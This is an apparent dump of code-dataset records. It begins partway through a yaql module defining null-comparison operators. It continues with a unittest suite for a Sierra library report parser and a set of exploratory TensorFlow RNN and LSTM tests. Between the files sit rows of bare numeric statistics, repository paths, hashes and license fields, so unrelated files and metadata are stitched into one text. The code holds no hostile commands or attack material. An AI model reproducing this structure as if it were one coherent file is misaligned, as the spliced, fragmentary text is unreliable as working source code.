    :arg right: right operand
    :argType right: not null
    :returnType: boolean
    .. code:
        yaql> null >= 2
        false
    """
    # null is strictly less than every non-null value, so >= is false.
    return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_<')
def null_lt_null(left, right):
    """:yaql:operator <
    Returns false. This function is called when left and right are null.
    :signature: left < right
    :arg left: left operand
    :argType left: null
    :arg right: right operand
    :argType right: null
    :returnType: boolean
    .. code:
        yaql> null < null
        false
    """
    # Two nulls compare equal for ordering, so strict < is false.
    return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_<=')
def null_lte_null(left, right):
    """:yaql:operator <=
    Returns true. This function is called when left and right are null.
    :signature: left <= right
    :arg left: left operand
    :argType left: null
    :arg right: right operand
    :argType right: null
    :returnType: boolean
    .. code:
        yaql> null <= null
        true
    """
    # null compares equal to null, so <= holds
    return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_>')
def null_gt_null(left, right):
    """:yaql:operator >
    Returns false. This function is called when left and right are null.
    :signature: left > right
    :arg left: left operand
    :argType left: null
    :arg right: right operand
    :argType right: null
    :returnType: boolean
    .. code:
        yaql> null > null
        false
    """
    # null compares equal to null, so it is not strictly greater
    return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_>=')
def null_gte_null(left, right):
    """:yaql:operator >=
    Returns true. This function is called when left and right are null.
    :signature: left >= right
    :arg left: left operand
    :argType left: null
    :arg right: right operand
    :argType right: null
    :returnType: boolean
    .. code:
        yaql> null >= null
        true
    """
    # null compares equal to null, so >= holds
    return True
def register(context):
    """Register the null-comparison operator implementations in *context*.

    Registration order mirrors the definition order of the functions so
    dispatch resolution stays identical.
    """
    for operator_fn in (
            eq,
            neq,
            left_lt_null,
            left_lte_null,
            left_gt_null,
            left_gte_null,
            null_lt_right,
            null_lte_right,
            null_gt_right,
            null_gte_right,
            null_lt_null,
            null_lte_null,
            null_gt_null,
            null_gte_null,
    ):
        context.register_function(operator_fn)
| 23.175793
| 78
| 0.657797
| 1,038
| 8,042
| 5.024085
| 0.120424
| 0.048322
| 0.058677
| 0.061361
| 0.863471
| 0.792138
| 0.790221
| 0.788303
| 0.788303
| 0.788303
| 0
| 0.002584
| 0.230042
| 8,042
| 346
| 79
| 23.242775
| 0.839632
| 0.540164
| 0
| 0.585366
| 0
| 0
| 0.087275
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.182927
| false
| 0
| 0.012195
| 0
| 0.365854
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0a029acc3f3049d4c570e788c164678931fdace5
| 32,346
|
py
|
Python
|
tests/test_sierra_parser.py
|
BookOps-CAT/QCbotB
|
258a3dd4a0b346c0fee82fe332e368c0b5c91440
|
[
"MIT"
] | null | null | null |
tests/test_sierra_parser.py
|
BookOps-CAT/QCbotB
|
258a3dd4a0b346c0fee82fe332e368c0b5c91440
|
[
"MIT"
] | 15
|
2018-01-19T17:39:08.000Z
|
2020-12-16T17:57:12.000Z
|
tests/test_sierra_parser.py
|
BookOps-CAT/QCbotB
|
258a3dd4a0b346c0fee82fe332e368c0b5c91440
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import unittest
from datetime import datetime
from context import sierra_parser
class TestParser(unittest.TestCase):
    """Test parsing of Sierra lists exported to file."""

    def test_verifying_bib_id(self):
        """Valid bib ids yield ints; malformed or missing input yields None."""
        self.assertEqual(sierra_parser.verify_bib_id('b119955209'), 11995520)
        self.assertEqual(sierra_parser.verify_bib_id('b12081951x'), 12081951)
        for bad_input in ('', None, 11995520):
            self.assertIsNone(sierra_parser.verify_bib_id(bad_input))
        self.assertIsNone(sierra_parser.verify_bib_id())

    def test_verifying_ord_id(self):
        """Valid order ids yield ints; malformed or missing input yields None."""
        self.assertEqual(sierra_parser.verify_ord_id('o19259785'), 1925978)
        self.assertEqual(sierra_parser.verify_ord_id('o1926029X'), 1926029)
        for bad_input in ('', None, 1199552):
            self.assertIsNone(sierra_parser.verify_ord_id(bad_input))
        self.assertIsNone(sierra_parser.verify_ord_id())

    def test_parsing_dates(self):
        """Both 4-digit and 2-digit year date strings parse; junk yields None."""
        long_year = datetime.now().strftime('%m-%d-%Y')
        short_year = datetime.now().strftime('%m-%d-%y')
        self.assertEqual(
            sierra_parser.parse_dates(long_year),
            datetime.strptime(long_year, '%m-%d-%Y'))
        self.assertEqual(
            sierra_parser.parse_dates(short_year),
            datetime.strptime(short_year, '%m-%d-%y'))
        self.assertIsNone(sierra_parser.parse_dates('some string'))
        self.assertIsNone(sierra_parser.parse_dates(' - - '))
        self.assertIsNone(sierra_parser.parse_dates())

    def test_verify_b_type(self):
        """Single letter codes pass through; blank or non-string yields None."""
        self.assertEqual(sierra_parser.verify_b_type('a'), 'a')
        for bad_input in ('', ' ', 1):
            self.assertIsNone(sierra_parser.verify_b_type(bad_input))

    def test_parse_title(self):
        """880-NN linkage prefixes are stripped; empty input yields None."""
        self.assertEqual(
            sierra_parser.parse_title(
                '880-02 [Perush ha-Ramban : ʻal ha-Torah] = Rambanh'),
            '[Perush ha-Ramban : ʻal ha-Torah] = Rambanh')
        self.assertEqual(
            sierra_parser.parse_title('TEST TITLE'), 'TEST TITLE')
        self.assertIsNone(sierra_parser.parse_title(''))
        self.assertIsNone(sierra_parser.parse_title())

    def test_parse_name(self):
        """Author names normalize to an uppercase ASCII surname."""
        name_cases = [
            (u'880-01 Shukshĭn, Vasiliĭ, 1929-1974', u'SHUKSHIN'),
            (u'Ṿalder, Ḥayim.', u'VALDER'),
            (u'Uderzo.', u'UDERZO'),
        ]
        for raw_name, expected in name_cases:
            self.assertEqual(sierra_parser.parse_name(raw_name), expected)
        self.assertIsNone(sierra_parser.parse_name(u''))

    def test_parse_subjects(self):
        """FAST (OCoLC) headings are dropped from the subject string."""
        self.assertEqual(
            sierra_parser.parse_subjects(
                'Automobile racing drivers -- Drama.~NASCAR (Association) -- Drama.~Fourth dimension. fast (OCoLC)fst00933422'),
            'Automobile racing drivers -- Drama.~NASCAR (Association) -- Drama.')
        self.assertEqual(sierra_parser.parse_subjects(''), '')

    def test_parse_subject_person(self):
        """Personal-name subjects are extracted; topical headings yield None."""
        person_cases = [
            ('Jackson, Percy (Fictitious character) -- Juvenile fiction',
             None),
            ('Lincoln, Abraham, 1809-1865 -- Military leadership.~Other subject',
             'Lincoln, Abraham, 1809-1865 -- Military leadership.'),
            ('Doe, Joe. Title of his work.',
             'Doe, Joe. Title of his work.'),
            ('Randolph, Martha Jefferson, 1772-1836.~Women -- United States -- History -- 18th century',
             'Randolph, Martha Jefferson, 1772-1836.'),
            ('880-05 Wang, Yangming.~Philosophers -- China -- Biography.',
             'Wang, Yangming.'),
            # -- biography will most likely pick up false positives
            ('Wang, Yangming.~Philosophers -- China -- Biography.',
             'Wang, Yangming.'),
            ('Wang.~Philosophers -- China -- Biography.',
             'Wang.'),
            ('Some Topic.~Philosophers -- China.', None),
            ('History, Millitary.', None),
            ('Jews -- Poland -- Warsaw.~Righteous Gentiles in the Holocaust -- Poland -- Warsaw.~Holocaust, Jewish (1939-1945) -- Poland -- Warsaw.~World War, 1939-1945 -- Jews -- Rescue -- Poland -- Warsaw.',
             None),
        ]
        for subject, expected in person_cases:
            if expected is None:
                self.assertIsNone(
                    sierra_parser.parse_subject_person(subject))
            else:
                self.assertEqual(
                    sierra_parser.parse_subject_person(subject), expected)

    def test_parse_branches(self):
        """Branch codes are deduplicated, sorted, and stripped of noise."""
        self.assertEqual(
            sierra_parser.parse_branches('03yfc,80yfc,71yfc,65yfc,56yfc'),
            '03,56,65,71,80')
        self.assertEqual(
            sierra_parser.parse_branches('03yfc(10),80 ,none '), '03,80')
        self.assertIsNone(sierra_parser.parse_branches(''))
        self.assertEqual(sierra_parser.parse_branches('elres'), '')

    def test_parse_shelves(self):
        # shelves in a string that is used to compare output
        # must be in alphabetical order
        self.assertEqual(
            sierra_parser.parse_shelves('14anb(2),21anf,23abi,56 '),
            'abi,anb,anf')
        self.assertIsNone(sierra_parser.parse_shelves('14 '))
        self.assertIsNone(sierra_parser.parse_shelves('none '))
        self.assertEqual(
            sierra_parser.parse_shelves('02jje(10),none ,21jje'), 'jje')

    def test_parse_call_format(self):
        """Call numbers map to two-letter format codes."""
        format_cases = [
            ('AUDIO B ADAMS C', 'au'),
            ('818 A', 'pr'),
            ('B BOOK C', 'pr'),
            ('DVD RUS J', 'dv'),
            ('BOOK & DVD 818 D', 'ki'),
            ('BOOK & CD', 'ki'),
            ('KIT', 'ki'),
            ('eBOOK', 'er'),
            ('eAUDIO', 'er'),
            ('eJOURNAL', 'er'),
            ('eMUSIC', 'er'),
            ('eVIDEO', 'er'),
            ('DVD-ROM 909 A', 'er'),
            ('CD-ROM 909 A', 'er'),
            ('LIB 782.1 AUBER', 'li'),
            ('Mu 780.4 K', 'mu'),
            ('NM 010.5 H', 'nm'),
            ('CD BLUES BO DIDDLEY', 'cd'),
            ('VIDEO', 'vi'),
            ('MIFI DEVICE', 'mi'),
            ('', 'pr'),
            ('READALONG J 811 A', 'ra'),
            ('READALONG J FIC ADAMS', 'ra'),
        ]
        for call_number, expected in format_cases:
            self.assertEqual(
                sierra_parser.parse_call_format(call_number), expected)

    def test_parse_call_audn(self):
        """Call numbers map to audience codes: e(asy), j(uvenile), a(dult)."""
        audn_cases = [
            ('J-E', 'e'),
            ('J-E SCIESZKA', 'e'),
            ('CHI J-E XI', 'e'),
            ('CHI J-E', 'e'),
            ('KIT J-E SCIESZKA', 'e'),
            ('J 811 B', 'j'),
            ('J B ADAMS W', 'j'),
            ('DVD J ANIMATION', 'j'),
            ('DVD RUS J ANIMATION', 'j'),
            ('DVD SPA J B ADAMS', 'j'),
            ('KIT J 909 A', 'j'),
            ('AUDIO J FIC ADAMS', 'j'),
            ('BOOK & CD J 494 A', 'j'),
            ('POL J FIC SCIESZKA', 'j'),
            ('DVD JPN', 'a'),
            ('B BAJ-EON C', 'a'),
            ('eBOOK', 'a'),
            ('811 J', 'a'),
            ('B ADAMS J', 'a'),
            ('DVD', 'a'),
            ('DVD JPN', 'a'),
            ('BOOK & CD RUS J 486.76 C', 'j'),
            ('BOOK & CD RUS 486.76 C', 'a'),
            ('FIC J', 'a'),
            ('CD J WORLD JEWISH COLLECTION', 'j'),
            # this can cause records with inverted order to miss the QC
            ('DVD J FRE', 'j'),
            ('READALONG J FIC ADAMS', 'j'),
            ('READALONG J 811 A', 'j'),
        ]
        for call_number, expected in audn_cases:
            self.assertEqual(
                sierra_parser.parse_call_audn(call_number), expected)

    def test_world_language_prefix(self):
        """World-language prefixes are detected only in the prefix position."""
        prefix_cases = [
            ('DVD OFF', False),
            ('DVD OFFICE', False),
            ('DVD 909 B', False),
            ('DVD B ADAMS A', False),
            ('DVD J B ADAMS A', False),
            ('DVD CHI OFFICE', True),
            ('DVD CHI J B ADAMS B', True),
            ('DVD J', False),
            ('', False),
            ('DVD ARA J HOME', True),
            ('DVD ARA J 909 A', True),
            ('AUDIO RUS FIC ADAMS', True),
            ('AUDIO RUS J FIC ADAMS', True),
            ('AUDIO J FIC ADAMS', False),
            ('AUDIO FIC ADAMS', False),
            ('AUDIO CHI 909 A', True),
            ('AUDIO FIC ADA', False),
            ('AUDIO RUS B ADAMS A', True),
            ('KIT RUS 909 A', True),
            ('KIT 909 A', False),
            ('KIT J 909 A', False),
            ('KIT RUS J 909 A', True),
            ('KIT 872.8 H', False),
            ('BOOK & CD RUS 811 B', True),
            ('BOOK & CD RUS J-E', True),
            ('BOOK & CD RUS J FIC A', True),
            ('BOOK & CD FIC ADA', False),
            ('BOOK & CD RUS B ADAMS A', True),
            ('BOOK & CD B ADAMS A', False),
            ('BOOK & CD 901 A', False),
            ('BOOK & CD J-E ADAMS', False),
            ('BOOK & DVD RUS 811 B', True),
            ('BOOK & DVD RUS J-E', True),
            ('BOOK & DVD RUS J FIC A', True),
            ('BOOK & DVD FIC ADA', False),
            ('BOOK & DVD RUS B ADAMS A', True),
            ('BOOK & DVD B ADAMS A', False),
            ('BOOK & DVD 901 A', False),
            ('BOOK & DVD RUS B ADA B', True),
            ('SPA J-E ADAMS', True),
            ('SPA FIC ADAMS', True),
            ('CHI J FIC ADAMS', True),
            ('POL B ADA J', True),
            ('RUS 811 B', True),
            ('VIDEO CHI', True),
            ('FIC ADAMS', False),
            ('B ADAMS J', False),
            ('J-E ADAMS', False),
            ('J-E JARAMILLO', False),
            ('J-E', False),
            ('FIC F', False),
            ('FIC BARTHELME', False),
            ('LIB 711.3 B', False),
            ('FIC JOHNSTONE', False),
            ('READALONG J FIC ADAMS', False),
            ('READALONG SPA J FIC ADAMS', True),
            ('READALONG SPA J 811 A', True),
        ]
        for call_number, expected in prefix_cases:
            if expected:
                self.assertTrue(
                    sierra_parser.world_lang_prefix(call_number))
            else:
                self.assertFalse(
                    sierra_parser.world_lang_prefix(call_number))

    def test_parse_call_type(self):
        """Call numbers classify into type codes; unknown patterns yield None."""
        type_cases = [
            ('SPA J-E ADAMS', 'eas'),
            ('J-E JARAMILLO', 'eas'),
            ('J-E ADAMS', 'eas'),
            ('J-E', 'eas'),
            ('KIT J-E ADAMS', 'eas'),
            ('FIC ADAMS', 'fic'),
            ('FIC B', 'fic'),
            ('POL J FIC ADAMS', 'fic'),
            ('FIC ADAMS', 'fic'),
            ('B ADAMS A', 'bio'),
            ('B ADA-BAD A', 'bio'),
            ('RUS B G\'OGOL A', 'bio'),
            ('DVD B ADAMS A', 'bio'),
            ('811 POE B', 'des'),
            ('641.5 ROB R', 'des'),  # this is incorrect call number
            ('762.6535 BOWIE B', 'des'),
            ('DVD 762.6535 BOWIE B', 'des'),
            ('005.133 SWIFT S', 'des'),
            ('004.1675 IPAD H', 'des'),
            ('818 P', 'dew'),
            ('909.765 P', 'dew'),
            ('822.33 S52 Q', 'des'),
            # older call number pattern
            ('929.2 H241 B2', 'des'),
            ('DVD', None),
            ('DVD J', 'fea'),
            ('DVD SPA', 'fea'),
            ('DVD SPA J', 'fea'),
            ('MIFI DEVICE', 'mif'),
            ('eBOOK', 'ere'),
            ('CD WORLD JEWISH SHWEKEY', 'cdm'),
            ('BOOK & CD 468.3421 B', 'dew'),
            ('BOOK & CD 811 WHITMAN K', 'des'),
            ('BOOK & CD ARA 428.34927 L', 'dew'),
            ('BOOK & CD J B ADAMS A', 'bio'),
            ('AUDIO 225.5208 B582 W', 'des'),
            ('AUDIO 782.1 WAGNER S', 'des'),
            ('AUDIO SPA FIC COELHO', 'fic'),
            ('AUDIO SPA B CRUZ M', 'bio'),
            ('AUDIO SPA J FIC SAINT-EXUPERY', 'fic'),
            ('RUS TROTSKY Z', None),
            ('READALONG J FIC ADAMS', 'fic'),
            ('READALONG J 811 A', 'dew'),
        ]
        for call_number, expected in type_cases:
            if expected is None:
                self.assertIsNone(
                    sierra_parser.parse_call_type(call_number))
            else:
                self.assertEqual(
                    sierra_parser.parse_call_type(call_number), expected)

    def test_parse_call_cutter(self):
        """Truthy when the call number ends with a cutter segment."""
        cutter_cases = [
            ('SPA J-E ADAMS', True),
            ('J-E', False),
            ('J B ADAMS J', True),
            ('BOOK & CD 987 J', True),
            ('AUDIO FIC ADAMS', True),
            ('CD FOLK COHEN', True),
            ('WEB SITE 909 B', True),
            ('909 B', True),
            ('RUS 811 POE B', True),
            ('SPA J-E', False),
            ('J FIC', False),
            ('FIC', False),
            ('J B', False),
            ('DVD RUS', False),
            ('DVD J', False),
            ('DVD RUS 909 B', True),
            ('DVD J 919 D', True),
            # incorrect, should be False but more work to distinguish
            # from DVD 1917 for example
            ('DVD J 919.34', True),
            ('DVD HARRY', True),
            ('DVD RUS HARRY', True),
            ('DVD FRE FAMILLE', True),
            ('DVD FRE J STELLA', True),
            ('909', False),
            ('MIFI DEVICE', False),
            ('eBOOK', False),
            ('658.058 D598', True),
            ('823.33 S52', False),
            ('823.33 S52 A B', True),
            ('226.607 B582', False),
            ('226.607 B582 C', True),
            ('AUDIO 226.607', False),
            ('AUDIO 226.607 C', True),
            ('FIC 1', False),
            # very unlikely sanborn cutters will be pick up
            ('973 A211', True),
            # extra white space in the call number
            ('J-E BUSSE', True),
            ('READALONG J FIC ADAMS', True),
            ('READALONG J 811 A', True),
            ('READALONG J FIC', False),
            ('READALONG SPA J FIC', False),
            ('READALONG SPA J FIC ADAMS', True),
        ]
        for call_number, expected in cutter_cases:
            if expected:
                self.assertTrue(
                    sierra_parser.parse_call_cutter(call_number))
            else:
                self.assertFalse(
                    sierra_parser.parse_call_cutter(call_number))

    def test_parse_dewey(self):
        """The Dewey segment is extracted; non-Dewey call numbers yield None."""
        dewey_cases = [
            ('909 B', '909'),
            ('J 909.993 B', '909.993'),
            ('DVD 909.76 B', '909.76'),
            ('004.54 PYTHON B', '004.54'),
            ('220.52 B582 C', '220.52'),
            ('FIC ADAMS', None),
            ('J B ADAMS C', None),
            ('DVD RUS', None),
            ('J-E ADAMS', None),
            ('READALONG J FIC ADAMS', None),
            ('READALONG J 945.2 A', '945.2'),
        ]
        for call_number, expected in dewey_cases:
            if expected is None:
                self.assertIsNone(
                    sierra_parser.parse_call_dewey(call_number))
            else:
                self.assertEqual(
                    sierra_parser.parse_call_dewey(call_number), expected)

    def test_identify_dewey_range(self):
        """Dewey numbers map onto collection-range codes."""
        range_cases = [
            ('060 E', 'll'),
            ('001.9 E', 'll'),
            ('428.4 S', 'll'),
            ('028.9 S', 'll'),
            ('811 S', 'll'),
            ('028.9 S', 'll'),
            ('070.92 S', 'll'),
            ('004.165 RASPBERRY PI R', 'ss'),
            ('190 B', 'ss'),
            ('341.02 D', 'ss'),
            ('509 D', 'ss'),
            ('641.72 D', 'ss'),
            ('208.23 D', 'hb'),
            ('900 D', 'hb'),
            ('391 D', 'ar'),
            ('711 D', 'ar'),
            ('294.3927 H', 'hb'),
        ]
        for call_number, expected in range_cases:
            self.assertEqual(
                sierra_parser.identify_dewey_range(call_number), expected)

    def test_parse_ord_audn(self):
        """Order codes map to audience letters; empty input yields None."""
        ord_audn_cases = [
            ('awl', 'a'),
            ('ynf', 'y'),
            ('jje', 'j'),
            ('', None),
            ('nac', 'a'),
            ('tab', 'a'),
            ('tcp', 'j'),
            ('mfi', 'a'),
            ('', None),
            ('jra', 'j'),
        ]
        for ord_code, expected in ord_audn_cases:
            if expected is None:
                self.assertIsNone(sierra_parser.parse_ord_audn(ord_code))
            else:
                self.assertEqual(
                    sierra_parser.parse_ord_audn(ord_code), expected)

    def test_parsing_of_row_of_sierra_report(self):
        """functional tests of sierra report parser"""
        reader = sierra_parser.report_data('report_test.txt', 180)
        for record in reader:
            bib_keys = list(record[0])
            ord_keys = list(record[1])
            self.assertEqual(bib_keys, [
                'c_format', 'c_dewey', 'b_date', 'c_wl', 'c_audn', 'id',
                'c_type', 'author', 'title', 'subject_person', 'c_cutter',
                'subjects', 'c_division', 'b_type', 'crit_work', 'b_call'])
            self.assertEqual(ord_keys, [
                'bid', 'o_branch', 'copies', 'o_date', 'o_audn',
                'o_shelf', 'ven_note', 'id'])
# Allow running this test module directly: python test_sierra_parser.py
if __name__ == '__main__':
    unittest.main()
| 35.820598
| 213
| 0.530854
| 3,319
| 32,346
| 4.904188
| 0.128352
| 0.205689
| 0.195306
| 0.243841
| 0.827671
| 0.817473
| 0.771825
| 0.590834
| 0.432451
| 0.255575
| 0
| 0.03109
| 0.371545
| 32,346
| 902
| 214
| 35.86031
| 0.769628
| 0.016138
| 0
| 0.656682
| 0
| 0.002304
| 0.142969
| 0.003018
| 0
| 0
| 0
| 0
| 0.321429
| 1
| 0.021889
| false
| 0
| 0.003456
| 0
| 0.026498
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0a1d9e9786e840bb30d3220dc7c0850535a579c8
| 8,084
|
py
|
Python
|
playground/test_rnn.py
|
stevenchen521/quant_ml
|
f7d5efc49c934724f97fcafacc560f4a35b24551
|
[
"MIT"
] | 5
|
2019-02-14T03:12:22.000Z
|
2022-01-24T18:43:07.000Z
|
playground/test_rnn.py
|
stevenchen521/quant_ml
|
f7d5efc49c934724f97fcafacc560f4a35b24551
|
[
"MIT"
] | null | null | null |
playground/test_rnn.py
|
stevenchen521/quant_ml
|
f7d5efc49c934724f97fcafacc560f4a35b24551
|
[
"MIT"
] | 2
|
2019-11-13T18:56:13.000Z
|
2021-12-31T01:25:22.000Z
|
import unittest
import tensorflow as tf
from .rnn_enh import MultiInputLSTMCell
from tensorflow.python.framework.tensor_shape import TensorShape
import numpy as np
import os
from helper.util import get_logger
class RNNTestCase(unittest.TestCase):
    """Exploratory tests for TensorFlow 1.x RNN cells and the project's
    MultiInputLSTMCell.

    These tests build graphs (and in the *_with_session variants run a
    session) mainly to log shapes/variables; they make no assertions.
    NOTE(review): original indentation was lost in transit — the nesting of
    the variable_scope blocks below is reconstructed and should be confirmed
    against the repository.
    """

    # directory where graph summaries and checkpoints are written
    LOG_DIR = './logs'

    def setUp(self):
        # fresh logger per test, named after this module
        self.LOGGER = get_logger(__name__)

    def test_basic_rnn_cell(self):
        """Build a single BasicRNNCell and run one step via __call__."""
        self.LOGGER.info(self._testMethodName)
        cell = tf.nn.rnn_cell.BasicRNNCell(num_units=128)  # state_size = 128
        self.LOGGER.info(cell.state_size)  # 128
        inputs = tf.placeholder(np.float32, shape=(32, 100))  # 32 is the batch_size
        h0 = cell.zero_state(32, np.float32)  # zero_state gives an all-zero initial state of shape (batch_size, state_size)
        output, h1 = cell.__call__(inputs, h0)  # invoke the call function
        self.LOGGER.info(h1.shape)  # (32, 128)

    def test_basic_rnn_cell2(self):
        """Same as above but build() the cell explicitly and use call()."""
        self.LOGGER.info(self._testMethodName)
        cell = tf.nn.rnn_cell.BasicRNNCell(num_units=128, dtype='float32')  # state_size = 128
        self.LOGGER.info(cell.state_size)  # 128
        inputs = tf.placeholder(np.float32, shape=(32, 100))  # 32 is the batch_size
        cell.build(inputs_shape=inputs.shape)
        h0 = cell.zero_state(32, np.float32)  # all-zero initial state of shape (batch_size, state_size)
        output, h1 = cell.call(inputs, h0)  # invoke call
        self.LOGGER.info(h1.shape)  # (32, 128)

    def test_basic_lstm_cell(self):
        """Build a BasicLSTMCell; its state is an (h, c) pair."""
        self.LOGGER.info(self._testMethodName)
        lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(num_units=128)
        inputs = tf.placeholder(np.float32, shape=(32, 100))  # 32 is the batch_size
        h0 = lstm_cell.zero_state(32, np.float32)  # all-zero initial state
        output, h1 = lstm_cell.__call__(inputs, h0)
        self.LOGGER.info(h1.h)  # shape=(32, 128)
        self.LOGGER.info(h1.c)  # shape=(32, 128)

    def test_multi_rnn_cell(self):
        """Stack three BasicRNNCells with MultiRNNCell and run one step."""
        self.LOGGER.info(self._testMethodName)

        # each call returns a fresh BasicRNNCell
        def get_a_cell():
            return tf.nn.rnn_cell.BasicRNNCell(num_units=128)

        # build a 3-layer RNN with tf.nn.rnn_cell.MultiRNNCell
        cell = tf.nn.rnn_cell.MultiRNNCell([get_a_cell() for _ in range(3)])  # 3-layer RNN
        # the resulting cell is itself an RNNCell subclass;
        # its state_size is (128, 128, 128) — this does not mean 128x128x128
        # but three hidden states, each of size 128
        self.LOGGER.info(cell.state_size)  # (128, 128, 128)
        # use the corresponding call function
        inputs = tf.placeholder(np.float32, shape=(32, 100))  # 32 is the batch_size
        h0 = cell.zero_state(32, np.float32)  # all-zero initial state
        output, h1 = cell.call(inputs, h0)
        self.LOGGER.info(h1)  # tuple holding three 32x128 tensors
        # sess = tf.Session()
        # self.LOGGER.info(sess.run())

    def test_dynamic_rnn(self):
        """Run a stacked RNN over a whole sequence with tf.nn.dynamic_rnn."""
        self.LOGGER.info(self._testMethodName)

        # each call returns a fresh BasicRNNCell
        def get_a_cell():
            return tf.nn.rnn_cell.BasicRNNCell(num_units=128)

        # build a 3-layer RNN with tf.nn.rnn_cell.MultiRNNCell
        cell = tf.nn.rnn_cell.MultiRNNCell([get_a_cell() for _ in range(3)])  # 3-layer RNN
        # the resulting cell is itself an RNNCell subclass;
        # its state_size is (128, 128, 128): three hidden states of size 128 each
        # self.LOGGER.info(cell.state_size)  # (128, 128, 128)
        # use the corresponding call function
        inputs = tf.placeholder(np.float32, shape=(32,10, 100))  # 32 is the batch_size
        h0 = cell.zero_state(32, np.float32)  # all-zero initial state
        outputs, state = tf.nn.dynamic_rnn(cell, inputs, initial_state=h0)
        tf.global_variables_initializer()
        # sess = tf.Session()
        # self.LOGGER.info(sess.run())

    def test_drnn_with_session(self):
        """As test_dynamic_rnn, but execute in a Session and save a checkpoint."""
        self.LOGGER.info(self._testMethodName)
        module_name = 'test_drnn_with_session'
        writer = tf.summary.FileWriter(os.path.join(self.LOG_DIR, module_name))

        # each call returns a fresh BasicLSTMCell
        def get_a_cell():
            return tf.nn.rnn_cell.BasicLSTMCell(num_units=128)

        with tf.variable_scope("MultiRNNCell"):
            # build a 3-layer RNN with tf.nn.rnn_cell.MultiRNNCell
            cell = tf.nn.rnn_cell.MultiRNNCell([get_a_cell() for _ in range(3)])  # 3-layer RNN
            h0 = cell.zero_state(32, np.float32)  # all-zero initial state
            # the resulting cell is itself an RNNCell subclass;
            # its state_size is (128, 128, 128): three hidden states of size 128 each
            # self.LOGGER.info(cell.state_size)  # (128, 128, 128)
        # use the corresponding call function
        with tf.variable_scope("inputs"):
            inputs = tf.placeholder(np.float32, shape=(32, 10, 100))  # 32 is the batch_size
        with tf.variable_scope("dynamic_rnn"):
            outputs, state = tf.nn.dynamic_rnn(cell, inputs, initial_state=h0)
        # sess = tf.Session()
        # self.LOGGER.info(sess.run())
        with tf.Session() as sess:
            tf.global_variables_initializer().run()
            saver = tf.train.Saver()
            writer.add_graph(sess.graph)
            tf.global_variables_initializer()
            train_data_feed = {
                inputs: [[[1.15 for k in range(100)] for j in range(10)] for i in range(32)]
            }
            a = sess.run([inputs], train_data_feed)
            saver.save(sess, os.path.join(self.LOG_DIR, module_name))

    def test_multi_input_lstm(self):
        """Build the custom MultiInputLSTMCell and log its trainable variables."""
        self.LOGGER.info(self._testMethodName)
        cell = MultiInputLSTMCell(num_units=128)  # state_size = 128
        # self.LOGGER.info(cell.state_size)  # 128
        cell.build(inputs_shape=TensorShape([32,100]))
        self.LOGGER.info(tf.contrib.framework.get_trainable_variables())

    def test_mirnn_with_session(self):
        """Stack MultiInputLSTMCells, run dynamic_rnn in a Session, save checkpoint."""
        self.LOGGER.info(self._testMethodName)
        # module_name = 'test_mirnn_with_session'
        writer = tf.summary.FileWriter(os.path.join(self.LOG_DIR, self._testMethodName))

        # each call returns a fresh MultiInputLSTMCell
        def get_a_cell():
            # return MultiInputLSTMCell(num_units=128, memory_slots=2, memory_size=128, keys={"key1":1})
            return MultiInputLSTMCell(num_units=128)

        with tf.variable_scope("MultiRNNCell"):
            #
            cell = tf.nn.rnn_cell.MultiRNNCell([get_a_cell() for _ in range(3)])  # 3-layer RNN
            h0 = cell.zero_state(32, np.float32)  # all-zero initial state
            # cell = get_a_cell()
            # h0 = cell.zero_state(32, np.float32)  # all-zero initial state
            # the resulting cell is itself an RNNCell subclass;
            # its state_size is (128, 128, 128): three hidden states of size 128 each
            # self.LOGGER.info(cell.state_size)  # (128, 128, 128)
        # use the corresponding call function
        with tf.variable_scope("inputs"):
            inputs = tf.placeholder(np.float32, shape=(32, 10, 100))  # 32 is the batch_size
        with tf.variable_scope("dynamic_rnn"):
            # outputs, state = tf.nn.dynamic_rnn(cell, inputs, initial_state=h0)
            outputs, state = tf.nn.dynamic_rnn(cell, inputs, dtype=float)
        # sess = tf.Session()
        # self.LOGGER.info(sess.run())
        with tf.Session() as sess:
            tf.global_variables_initializer().run()
            saver = tf.train.Saver()
            writer.add_graph(sess.graph)
            tf.global_variables_initializer()
            train_data_feed = {
                inputs: [[[1.15 for k in range(100)] for j in range(10)] for i in range(32)]
            }
            a = sess.run([inputs], train_data_feed)
            saver.save(sess, os.path.join(self.LOG_DIR, self._testMethodName))
        self.LOGGER.info(tf.contrib.framework.get_trainable_variables())

    def test_tensorflow_basic(self):
        """Exercise constant/expand_dims/tile tensor ops and log the shapes."""
        self.LOGGER.info(self._testMethodName)
        # Create a tensor
        c = tf.constant([0 for _ in range(128)])
        self.LOGGER.info(c)
        # Expand one dimension
        e = tf.expand_dims(c, 0)
        self.LOGGER.info(e)
        # duplicate 32 rows/batch size
        t = tf.tile(e, [32, 1])
        self.LOGGER.info(t)
if __name__ == '__main__':
unittest.main()
| 34.4
| 104
| 0.631123
| 1,019
| 8,084
| 4.802748
| 0.140334
| 0.063343
| 0.085819
| 0.029424
| 0.842051
| 0.826931
| 0.819575
| 0.803228
| 0.733347
| 0.733347
| 0
| 0.069509
| 0.25433
| 8,084
| 234
| 105
| 34.547009
| 0.742369
| 0.24332
| 0
| 0.568966
| 0
| 0
| 0.016744
| 0.003647
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12069
| false
| 0
| 0.060345
| 0.034483
| 0.232759
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
